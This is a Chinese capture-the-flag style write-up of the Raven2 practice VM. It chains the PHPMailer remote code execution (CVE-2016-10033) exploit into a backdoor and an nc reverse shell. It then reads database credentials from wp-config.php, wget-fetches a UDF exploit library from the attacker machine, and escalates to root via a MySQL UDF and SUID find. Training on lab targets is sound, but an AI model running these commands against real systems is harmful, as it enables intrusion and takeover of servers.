在Raven1渗透实战中利用ssh的登录michael账号,查看wordpress的mysql数据库中的root账号、密码进行登录,再利用mysql udf提权。
或者通过wordpress.users表中的steven账号、密码进行ssh登录后,执行python提权。
但在Raven2渗透实战中发现wordpress泄露出来的账号 michael无法通过ssh登录,上述的方法自然就不可行了。
但在渗透过程中发现phpmalier远程代码执行漏洞(CVE-2016-10033)
phpmailer远程代码执行
在 http://192.168.8.126/vendor/PATH 发现第一个flag和网站根路径:/var/www/html/
flag1
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
在 http://192.168.8.126/vendor/VERSION 发现版本号 5.2.16
在kali中
searchsploit phpmailer
searchsploit
5.2.16版本正好在射程范围之内,选择40974.py,复制到根目录
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/
更改配置信息,目标target,生成的后门文件名一定要改,shell反弹,后门路径
(注:targer地址应是站点的contact.php)
40974.py
运行该py程序,在靶机生成后门
python3 40974.py
(可能报错,pip安装所需要的模块即可)
python3 40974.py
在kali上开启nc监听,等待反弹,
nc -lvp 6666
触发后门:http://192.168.8.126/mm.php
反弹shell
用python切换到交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
python shell
接下来直接先全局搜flag:
find flag
找到flag3,是图片,直接访问
http://192.168.8.126/wordpress/wp-content/uploads/2018/11/flag3.png
flag3
之后只要重复Raven1中的操作,查看wordpress中config配置,登录数据库
cat wp-config.php
wp-config
登录数据库
root / R@v3nSecurity
mysql –uroot –p
提权
进入wordpress数据库,查看users表
select * from wp_users
wp-users
michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 (解不出来)
steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad.
steven
steven / LOLLOL1直接尝试ssh登录,竟然失败了,果然没Raven1这么简单
mysql udf提权
phpmailer反弹回来的shell是无法上传文件的,
只能通过wget从kali中下载exp (kali开启了apach服务)
先将exp 1518.c 在本地kali上编译完成后,靶机在wget
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc
靶机wget,编译后生成1518.so和1518.o,只需要1518.so即可
wget http://192.168.8.253/1518.so
wget
接下来提权过程就照着参考敲命令
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.01 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.12 sec)
mysql> insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.12 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.03 sec)
mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.11 sec)
mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name | ret | dl | type |
+-----------+-----+---------+----------+
| do_system | 2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)
mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.01 sec)
mysql> quit
Bye
touch foo
find foo -exec 'whoami' \;
find foo -exec '/bin/sh' \;
Raven2
完成了Raven2渗透
Raven2靶机百度云
链接:https://pan.baidu.com/s/17vBNAeodW_tnBCMHFXK8QA
提取码:yusb
网友评论